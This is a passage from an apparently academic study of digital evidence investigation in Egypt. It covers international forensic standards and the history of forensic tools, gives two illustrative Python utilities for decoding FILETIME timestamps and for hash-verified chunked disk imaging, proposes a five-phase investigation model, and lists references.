There have been several noteworthy developments toward standardization in this field. The International Organization of Computer Evidence (www.ioce.org) was established in the mid-1990s "to ensure the harmonization of methods and practices among nations and guarantee the ability to use digital evidence collected by one state in the courts of another state." In 1998, the Scientific Working Group on Digital Evidence (www.swgde.org) was established to "promulgate accepted forensic guidelines and definitions for the handling of digital evidence." In 2001, the first Digital Forensics Research Workshop (www.dfrws.org) was held, bringing together knowledgeable individuals from academia, the military and the private sector to discuss the main challenges and research needs in the field. This workshop also gave new life to an idea proposed several years earlier, a peer-reviewed journal, leading to the creation of the International Journal of Digital Evidence (www.ijde.org). In 2003, the American Society of Crime Laboratory Directors/Laboratory Accreditation Board (ASCLD/LAB) updated its accreditation manual to include standards and criteria for digital evidence examiners in US crime laboratories. In 2004 the UK Forensic Science Service plans to develop a registry of qualified experts, and several European organizations, including the European Network of Forensic Science Institutes (ENFSI), will publish examination and report writing guidelines for digital investigators. Also, Elsevier will begin publishing Digital Investigation: The International Journal of Digital Forensics and Incident Response (http://www.compseconline.com/digitalinvestigation/).
Historically, Forensic Science disciplines have used certification to oversee standards of practice and training. Certification provides a standard that individuals need to reach to qualify in a profession and provides an incentive to reach a certain level of knowledge. Without certification, the target and rewards of extra effort are unclear. This is not to say that everyone who handles digital evidence requires the same level of skill or training. A strong certification program needs to have tiered levels of certification facilitating progression upwards, setting basic requirements for crime scene technicians, and setting higher standards for specialists in a laboratory and for investigators who are responsible for analyzing evidence.
Although there are a growing number of certification programs for digital investigators, many are only available to law enforcement personnel and none are internationally accepted. In 2004, representatives from around the world convened to discuss the feasibility of an internationally accepted certification for digital investigators. The outcome is not decided and there are obstacles to such a certification. Some feel that proposed training requirements are too high, while others fear that certification will enable anyone to enter the field and obtain specialized knowledge, even individuals who work for the defense on criminal cases. There is also the fear that setting standards and placing additional requirements on practitioners will make it more difficult to get digital evidence admitted in court (11).



Scientific Working Group on Digital Evidence (SWGDE) (12)

International Organization on Computer Evidence (IOCE)

2.3 Standards:

Principle 1
In order to ensure that digital evidence is collected, preserved, examined, or transferred in a manner safeguarding the accuracy and reliability of the evidence, law enforcement and forensic organizations must establish and maintain an effective quality system. Standard Operating Procedures (SOPs) are documented quality-control guidelines that must be supported by proper case records and use broadly accepted procedures, equipment, and materials.
Standards and Criteria 1.1
All agencies that seize and/or examine digital evidence must maintain an appropriate SOP document. All elements of an agency's policies and procedures concerning digital evidence must be clearly set forth in this SOP document, which must be issued under the agency's management authority.
Discussion. The use of SOPs is fundamental to both law enforcement and forensic science. Guidelines that are consistent with scientific and legal principles are essential to the acceptance of results and conclusions by courts and other agencies. The development and implementation of these SOPs must be under an agency's management authority.
Standards and Criteria 1.2
Agency management must review the SOPs on an annual basis to ensure their continued suitability and effectiveness.
Discussion. Rapid technological changes are the hallmark of digital evidence, with the types, formats, and methods for seizing and examining digital evidence changing quickly. In order to ensure that personnel, training, equipment, and procedures continue to be appropriate and effective, management must review and update SOP documents annually.
Standards and Criteria 1.3
Procedures used must be generally accepted in the field or supported by data gathered and recorded in a scientific manner.
Discussion. Because a variety of scientific procedures may validly be applied to a given problem, standards and criteria for assessing procedures need to remain flexible. The validity of a procedure may be established by demonstrating the accuracy and reliability of specific techniques. In the digital evidence area, peer review of SOPs by other agencies may be useful.
Standards and Criteria 1.4
The agency must maintain written copies of appropriate technical procedures.
Discussion. Procedures should set forth their purpose and appropriate application. Required elements such as hardware and software must be listed and the proper steps for successful use should be listed or discussed. Any limitations in the use of the procedure or the use or interpretation of the results should be established. Personnel who use these procedures must be familiar with them and have them available for reference.
Standards and Criteria 1.5
The agency must use hardware and software that is appropriate and effective for the seizure or examination procedure.
Discussion. Although many acceptable procedures may be used to perform a task, considerable variation among cases requires that personnel have the flexibility to exercise judgment in selecting a method appropriate to the problem.
Hardware used in the seizure and/or examination of digital evidence should be in good operating condition and be tested to ensure that it operates correctly. Software must be tested to ensure that it produces reliable results for use in seizure and/or examination purposes.
Standards and Criteria 1.6
All activity relating to the seizure, storage, examination, or transfer of digital evidence must be recorded in writing and be available for review and testimony.
Discussion. In general, documentation to support conclusions must be such that, in the absence of the originator, another competent person could evaluate what was done, interpret the data, and arrive at the same conclusions as the originator.
The requirement for evidence reliability necessitates a chain of custody for all items of evidence. Chain-of-custody documentation must be maintained for all digital evidence.
Case notes and records of observations must be of a permanent nature. Handwritten notes and observations must be in ink, not pencil, although pencil (including color) may be appropriate for diagrams or making tracings. Any corrections to notes must be made by an initialed, single strikeout; nothing in the handwritten information should be obliterated or erased. Notes and records should be authenticated by handwritten signatures, initials, digital signatures, or other marking systems.
Standards and Criteria 1.7
Any action that has the potential to alter, damage, or destroy any aspect of original evidence must be performed by qualified persons in a forensically sound manner.
Discussion. As outlined in the preceding standards and criteria, evidence has value only if it can be shown to be accurate, reliable, and controlled. A quality forensic program consists of properly trained personnel and appropriate equipment, software, and procedures to collectively ensure these attributes.

2.4 Investigative Tools:
2.4.1 Overview:
In the early days of computer crime investigation, it was common for digital investigators to use the evidentiary computer itself to obtain evidence. One risk of this approach was that operating the evidentiary computer could alter the evidence in a way that is undetectable. Although programs such as dd on UNIX existed in the 1980s and could be used to capture deleted data stored on a hard drive, these tools were not widely used and most digital evidence examinations at that time were performed at the file system level, neglecting deleted data.
It was not until the early 1990s that tools like SafeBack and DIBS were developed to enable digital investigators to collect all data on a computer disk without altering important details. At around the same time, tools such as those still available from Maresware and NTI were developed by individuals from the US Internal Revenue Service (IRS) to help digital investigators process data on a computer disk. The Royal Canadian Mounted Police (RCMP) also developed specialized tools for examining computers. As more people became aware of the evidentiary value of computers, the need for more advanced tools grew. To address this need, integrated tools like EnCase and FTK were developed to make the digital investigator's job easier. These tools enable more efficient examination by automating routine tasks and displaying data in a graphical user interface to help the user locate important details. Recently, there has been renewed interest in Linux as a digital evidence examination platform, and tools such as The Sleuth Kit and SMART have been developed to provide a user-friendly interface. More sophisticated tools utilizing powerful microscopes are available to recover overwritten data from hard drives, but these are prohibitively expensive for most purposes.
Unfortunately, many individuals are still unaware of the need for these tools. Although courts have been lenient on investigators who mishandle digital evidence, this is changing as awareness of the associated issues grows. Gates Rubber Co. v. Bando Chemical Indus. Ltd. provides an example of one court that criticized an investigator for improper digital evidence handling. Instead of using specialized digital evidence processing tools, the investigator copied individual files from the computer and was criticized by the court for not using "the method which would yield the most complete and accurate results."
There has been a similar progression in the evolution of tools for collecting evidence on communication systems. In the late 1980s, Clifford Stoll described how he made paper printouts of network traffic in an effort to preserve it as evidence. Network monitoring tools like tcpdump and Ethereal can be used to capture network traffic but they are not specifically designed for collecting digital evidence. Commercial tools such as Carnivore, NetIntercept, NFR Security, NetWitness, and SilentRunner have been developed with integrated search, visualization, and analysis features to help digital investigators extract information from network traffic.
There has been a similar progression in the evolution of tools for collecting evidence on embedded computer systems. It is common for digital investigators to read data from pagers, mobile phones, and personal digital assistants directly from the devices. However, this approach does not provide access to deleted data and may not be possible if the device is password protected or does not have a way to display the data it contains. Therefore, tools such as ZERT, TULP, and Cards4Labs have been developed to access password protected and deleted data. More sophisticated techniques involving electron microscopes are available to recover encrypted data from embedded systems but these are prohibitively expensive for most purposes.
Over the years, bugs have been found in various digital evidence processing tools, potentially causing evidence to be missed or misinterpreted. To avoid the miscarriages of justice that may result from such errors, it is desirable to assess the reliability of commonly used tools. The National Institute of Standards and Technology is making an effort to test some digital evidence processing tools. However, testing even the most basic functionality of tools is a time-intensive process, making it difficult to keep up with changes in the tools. Also, it is unlikely that a single group can test every tool, including those used to collect evidence from networks and embedded systems. Additionally, in some instances, it may not be possible to create standard tests for the advanced features of various tools, because each tool has different features.
Another approach that has been suggested to reduce the complexity of tool testing is to allow people to see the source code for critical components of the software. Providing programmers around the world with source code allows tool testers to gain a better understanding of the program and increases the chances that bugs will be found. It is acknowledged that commercial tool developers will want to keep some portions of their programs private to protect their competitive advantage. However, certain operations, such as copying data from a hard drive, are sufficiently common and critical to require an open standard. Ultimately, given the complexity of computer systems and the tools used to examine them, it is not possible to eliminate or even quantify the errors, uncertainties, and losses, and digital investigators must validate their own results using multiple tools (11).



2.4.2 Examples of hardware tools:
2.4.2.1 Forensic system:

Figure 2.1: Forensic system

The F.R.E.D. family of forensic workstations consists of integrated forensic processing platforms capable of handling the most challenging computer case. Available in mobile, stationary and laboratory configurations, these systems are designed for both the acquisition and examination of computer evidence (13).
2.4.2.2 RoadMASSter-3:

Figure 2.2: RoadMASSter-3
The RoadMASSter 3 forensic data acquisition and analysis tool is designed to perform both as a fast and reliable hard drive imaging unit and as a data analysis unit. This computer forensic system is built for the road, with all the tools necessary to acquire or analyze data from today's common interface technologies including FireWire 1394A/B, USB, IDE, SATA, SAS and SCSI. With features such as multiple media support, multiple capture mode support, on-the-fly hashing capabilities and a powerful processor for analysis, the RoadMASSter 3 is a versatile and powerful forensic tool (14).

2.4.2.3 HardCopy II Drive Imaging System:

Figure 2.3: HardCopy II Drive Imaging System


HardCopy 2 copies drives at up to 5.5 GB per minute, has built-in MD5 hashing, is lightweight, and offers all the power of HardCopy and then some. HardCopy 2 adds the ability to chunk the data during a hard drive image, to ease archiving later (15).


2.4.2.4 ImageMASSter 6007SAS:

Figure 2.4: ImageMASSter 6007SAS


ICS Industrial High-Speed Multiple Hard Drive Duplicators are used for hard drive cloning, copying data, upgrading computers and sanitizing hard drives on the production lines of the major PC manufacturers as well as thousands of large and mid-size corporations. They copy data in different modes, image hard drives of different sizes and models, erase data, copy hidden partitions, format hard drives, and provide reliable hard drive cloning (14).

2.4.3 Examples of software tools:
2.4.3.1 EnCase® Software:


(http://www.guidancesoftware.com/)

Figure 2.5: EnCase® Software


EnCase is the hands-down leader in stand-alone forensics analysis software. EnCase is loaded with features, and is widely accepted in court. Users can examine files, including deleted files and unallocated data. It produces reports and extracts without altering the original data (16).

2.4.3.2 The Forensic ToolKit:

Figure 2.6: The Forensic ToolKit

Figure 2.7: Screenshot for Forensic Toolkit


Forensic Toolkit's customizable filters allow you to sort through thousands of files to quickly find the evidence you need. Forensic Toolkit is recognized as the leading forensic tool for performing e-mail analysis (13).


2.4.3.3 Decode - Forensic Date/Time Decoder:

Figure 2.8: Screenshot for Decode - Forensic Date/Time Decoder


This utility was designed to decode the various date/time values found embedded within binary and other file types. This release now supports the following date/time formats and will allow you to specify the offset from GMT.
Date and time values are stored within Windows in various formats. For example, Internet History (index.dat), recycle bin INFO files, Windows link files and Microsoft Office documents all contain a 64-bit date/time structure.
During a forensic examination, you may need to decode a date or verify the date provided to you by forensic software. This is where Decode comes in. Decode can take a decimal value or a HEX value and convert it into a date and time in a variety of formats (17).
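The 64-bit structure referred to above is the Windows FILETIME, a count of 100-nanosecond ticks since 1601-01-01 UTC. The following decoder is an added example, not the Decode tool's own code; it accepts the same kinds of input the text describes (a decimal value, a hex value, and a GMT offset) and additionally the eight raw little-endian bytes as they lie in a file. The sample values in the block are constructed.

```python
"""Windows FILETIME decoder in the spirit of the Decode utility described above.
Added example, not the Decode tool's own code. FILETIME is a 64-bit count of
100-nanosecond intervals since 1601-01-01 00:00:00 UTC, the structure found in
index.dat records, recycle-bin INFO files, .lnk files and Office documents."""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # one tick = 100 ns
# Largest tick count that still maps onto a calendar date Python can represent (year 9999).
MAX_TICKS = int((datetime(9999, 12, 31, tzinfo=timezone.utc) - FILETIME_EPOCH).total_seconds()) * TICKS_PER_SECOND


def parse_filetime(text: str, base: int = 10, little_endian: bool = False) -> int:
    """Turn the textual forms an examiner meets into a tick count.

    base=10  decimal, as shown by many forensic suites ("116444736000000000")
    base=16  hex as a number ("0x019DB1DED53E8000"), or, with little_endian=True,
             the 16 hex digits of the 8 bytes exactly as they lie in the file
             (least significant byte first: "00803ED5DEB19D01")
    """
    s = text.strip().replace(" ", "")
    if base == 16 and s.lower().startswith("0x"):
        s = s[2:]
    if little_endian:
        if base != 16 or len(s) != 16:
            raise ValueError("little-endian input must be exactly 8 bytes (16 hex digits)")
        ticks = int.from_bytes(bytes.fromhex(s), "little")
    else:
        ticks = int(s, base)
    if not 0 <= ticks <= MAX_TICKS:
        raise ValueError(f"{ticks} is outside the range of a FILETIME that maps to a date")
    return ticks


def filetime_to_datetime(ticks: int, gmt_offset_hours: float = 0.0) -> datetime:
    """Convert ticks to an aware datetime, shifted to the examiner-supplied GMT offset."""
    seconds, remainder = divmod(ticks, TICKS_PER_SECOND)
    utc = FILETIME_EPOCH + timedelta(seconds=seconds, microseconds=remainder // 10)
    return utc.astimezone(timezone(timedelta(hours=gmt_offset_hours)))


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse conversion, useful to cross-check a date reported by another tool."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def decode(text: str, base: int = 10, little_endian: bool = False,
           gmt_offset_hours: float = 0.0) -> str:
    """One-call equivalent of typing a value into Decode: returns an ISO 8601 string."""
    ticks = parse_filetime(text, base, little_endian)
    return filetime_to_datetime(ticks, gmt_offset_hours).isoformat()


if __name__ == "__main__":
    # Constructed sample: the FILETIME of the Unix epoch (1970-01-01 00:00:00 UTC)
    print(decode("116444736000000000"))
    print(decode("0x019DB1DED53E8000", base=16, gmt_offset_hours=2))
    print(decode("00803ED5DEB19D01", base=16, little_endian=True))
```

Note that a FILETIME taken from a file must be read little-endian; reading the same eight bytes as a big-endian number yields a nonsense date, which is the most common mistake when verifying a tool's output by hand.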

Part III

Standard model for digital evidences investigation in Egypt


Any scientific work can be represented by a triangle: the first side is qualified persons, the second is the appropriate tools, and the third is the methodology.
A standard model should take these three points into account:

3.1 Qualified persons:

Three different categories of personnel deal with digital evidence:


Digital Crime Scene Technicians: Individuals responsible for gathering data at a crime scene should have basic training in evidence handling and documentation as well as in basic crime reconstruction to help them locate all available sources of evidence on a network.
Digital Evidence Examiners: Individuals responsible for processing particular kinds of digital evidence require specialized training and certification in their area.
Digital Investigators: Individuals responsible for the overall investigation should receive a general training but do not need very specialized training or certification. Investigators are also responsible for reconstructing the actions relating to a crime using information from first responders and forensic examiners to create a more complete picture for investigators and attorneys.


Training and certification programs in this field should take into account these different areas of expertise (11).

[Principle 1: There must be a minimum qualification and certification for persons dealing with digital evidence, according to their specialties.]


3.2 Appropriate tools:
As noted above, many hardware and software tools are used in digital evidence investigation.

[Principle 2: There must be a list of approved software and hardware tools used in digital evidence investigation, and it must be checked and updated regularly.]

3.3 Methodology:
There is no ONE methodology for performing a forensic investigation and analysis. There are too many variables for there to be just one way. Some of the 'typical' variables which first come to mind include: operating systems, software applications, cryptographic algorithms and applications, and hardware platforms. Every investigation is unique and can bring unforeseeable challenges, so the methodology should not be viewed as an end-point but rather as a framework or foundation upon which to build.
[Principle 3: Document everything.]
Documentation is essential at all stages of handling and processing digital evidence. It is very important to document every procedure in the investigation (who, when, how, where).
[Principle 4: The integrity of the original media must be maintained throughout the entire investigation; the state of the evidence must be unaltered.]
Where possible, make an exact image of the investigated media; many software and hardware tools support this process, and always use tools suitable for your case.
[Principle 5: The investigation process must be divided into five phases: Identification, Collection, Examination, Analysis and Reporting.]
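Principle 4 in practice, together with the chunked imaging and on-the-fly hashing that the HardCopy II and RoadMASSter-3 descriptions above advertise, as an added example that is not any vendor's code: the source is read once and never written to, every chunk and the whole image are hashed while being copied, and a later verification pinpoints any chunk that no longer matches. The "drive" is constructed in-memory sample data.

```python
"""Chunked imaging with on-the-fly hashing, added as an illustration of Principle 4
and of the chunking/hashing features the hardware imagers above advertise. Not any
vendor's code. The source is read exactly once and never written to; each chunk file
and the whole image get an MD5 (what most imagers report) and a SHA-256 (collision
resistant) so that later verification can localise any damaged or altered chunk."""
import hashlib
import io
import os
import random
import shutil
import tempfile

BLOCK = 65536  # read granularity; has no effect on the resulting hashes


def image_device(source, chunk_size, dest_dir):
    """Stream `source` (a read-only file-like object) into dest_dir/image.000, .001, ...
    Returns a manifest listing every chunk's size and hashes plus whole-image hashes."""
    os.makedirs(dest_dir, exist_ok=True)
    whole_md5, whole_sha = hashlib.md5(), hashlib.sha256()
    chunks = []
    index = 0
    while True:
        name = f"image.{index:03d}"
        chunk_md5, chunk_sha = hashlib.md5(), hashlib.sha256()
        written = 0
        path = os.path.join(dest_dir, name)
        with open(path, "wb") as out:
            while written < chunk_size:
                buf = source.read(min(BLOCK, chunk_size - written))
                if not buf:
                    break
                out.write(buf)
                written += len(buf)
                for h in (chunk_md5, chunk_sha, whole_md5, whole_sha):
                    h.update(buf)
        if written == 0:            # source was exhausted exactly on a chunk boundary
            os.remove(path)
            break
        chunks.append({"name": name, "size": written,
                       "md5": chunk_md5.hexdigest(), "sha256": chunk_sha.hexdigest()})
        index += 1
        if written < chunk_size:    # short final chunk: end of source
            break
    return {"chunks": chunks, "total_size": sum(c["size"] for c in chunks),
            "md5": whole_md5.hexdigest(), "sha256": whole_sha.hexdigest()}


def verify_image(manifest, dest_dir):
    """Re-hash every chunk and their concatenation; return the names that no longer match."""
    whole_sha = hashlib.sha256()
    problems = []
    for chunk in manifest["chunks"]:
        chunk_sha = hashlib.sha256()
        with open(os.path.join(dest_dir, chunk["name"]), "rb") as f:
            for buf in iter(lambda: f.read(BLOCK), b""):
                chunk_sha.update(buf)
                whole_sha.update(buf)
        if chunk_sha.hexdigest() != chunk["sha256"]:
            problems.append(chunk["name"])
    if whole_sha.hexdigest() != manifest["sha256"]:
        problems.append("whole-image")
    return problems


def run_demo():
    """Image a constructed 250,000-byte 'drive' in 100,000-byte chunks, verify the copy,
    then corrupt one byte of the second chunk and show that verification pinpoints it."""
    rng = random.Random(2009)                       # deterministic constructed sample data
    device = bytes(rng.getrandbits(8) for _ in range(250_000))
    work_dir = tempfile.mkdtemp(prefix="image_demo_")
    try:
        manifest = image_device(io.BytesIO(device), 100_000, work_dir)
        clean = verify_image(manifest, work_dir)
        victim = os.path.join(work_dir, manifest["chunks"][1]["name"])
        with open(victim, "r+b") as f:             # simulate a damaged or altered copy
            f.seek(10)
            original = f.read(1)
            f.seek(10)
            f.write(bytes([original[0] ^ 0xFF]))
        tampered = verify_image(manifest, work_dir)
    finally:
        shutil.rmtree(work_dir, ignore_errors=True)
    return {"chunk_count": len(manifest["chunks"]), "total_size": manifest["total_size"],
            "image_sha256": manifest["sha256"],
            "source_sha256": hashlib.sha256(device).hexdigest(),  # independent re-hash of the original
            "clean_problems": clean, "tampered_problems": tampered}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The manifest is the piece of documentation Principle 3 asks for: recorded at acquisition time, it lets a second examiner with a different tool re-hash the chunks and reach the same conclusion.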

· Identification:
Recognizing an incident from its indicators and determining its type; each type of e-crime has its own types of digital evidence.
· Collection:
Collection of digital evidence must be done without altering it; there must be specific rules for collecting different kinds of evidence.
· Examination:
It is an in-depth systematic search of evidence relating to the suspected crime.
· Analysis:
Determination of the significance, reconstructing fragments of data and drawing conclusions based on evidence found.
· Reporting:
Writing a report is one of the most important stages of the investigative reconstruction process because, unless findings are communicated clearly in writing, others are unlikely to understand or make use of them; there must be standard templates for every kind of investigations.
References
[1] Technical Working Group for Electronic Crime Scene Investigation, 2001, Electronic Crime Scene Investigation: A Guide for First Responders.
http://www.ojp****doj.gov/nij/pubs-sum/187736.htm
[2] Computer crime, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Computer_crime
[3] United Nations Office at Vienna, 1994, United Nations Manual on the Prevention and Control of Computer-Related Crime, International Review of Criminal Policy, Nos. 43 and 44.
http://www.unodc.org/unodc/crime_cicp_standards_manuals.html
[4] Egypt's Information Portal, Ministry of Communication and Information Technology.
http://www.ipgd.idsc.gov.eg/Indicators/IndicatorsResult_Details.asp?IndicatorID=657
[5] Credit card fraud, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Credit_card_fraud
[6] Devices Designed Illegally to Read Credit Card Information from Gas Station Pumps, Arizona Department of Weights and Measures.
http://azdwm.gov/Portals/1/PDF/SkimmerPressReleaseJune2007.pdf
[7] Phishing, Webopedia, online computer dictionary for computer and internet terms and definitions.
http://www.webopedia.com/TERM/p/phishing.html
[8] Phishtank.
http://www.phishtank.com/images/phish_world_map.gif
[9] Lee H., Palmbach T. and Miller M. (2001) Henry Lee's Crime Scene Handbook, London: Academic Press.
[10] Digital evidence, Wikipedia, the free encyclopedia.
http://en.wikipedia.org/wiki/Digital_evidence
[11] Casey E., 2004, Digital Evidence and Computer Crime: Forensic Science, Computers, and the Internet, Second Edition, Academic Press.
[12] Scientific Working Group on Digital Evidence (SWGDE), International Organization on Computer Evidence (IOCE), 2000, Digital Evidence: Standards and Principles, Forensic Science Communications, Volume 2, Number 2, U.S. Department of Justice.
http://www.fbi.gov/hq/lab/fsc/backissu/april2000/swgde.htm
[13] Digital Intelligence, Software, Hardware, Training & Casework solutions for the computer community.
http://www.digitalintelligence.com/forensichardware.php
[14] Intelligent Computer Solutions.
http://www.ics-iq.com/
[15] Forensicpc.com.
http://www.forensicpc.com/proddetail.asp?prod=HARDCOPY2
[16] Genco A. Elizabeth, 2002, Do-it-yourselfer experiences the do's and don'ts of building a forensics workstation.
http://searchsecurity.techtarget.com/
[17] Digital Detective (Forensic Computing Tools & Utilities).
http://www.digital-detective.co.uk/freetools/decode.asp

Arabic Summary


Summary

With the steady increase in the use of computers, the Internet and modern means of communication, there is a corresponding increase in the use of these means either as aids to traditional crimes or in new kinds of crime; all such crimes can be called information technology crimes or electronic crimes.
Information technology crimes can be viewed from more than one point of view: they can be studied from a legal point of view, from the point of view of sociology, or from the point of view of computer science.
In this study, however, we have approached them from the point of view of the forensic (medico-legal) sciences. We began with the definition of these crimes and their common types and listed a number of real cases of such crimes in Egypt. We then addressed the core of the subject from the forensic point of view, namely evidence and the methods of investigating it: we defined digital evidence and its types, the pressing need for governing principles for this science, the international effort made to establish those principles, the development of the process of searching for evidence, and examples of the tools used in that process. Finally, we proposed a standard model for the investigation of digital evidence in Egypt by applying a number of basic principles.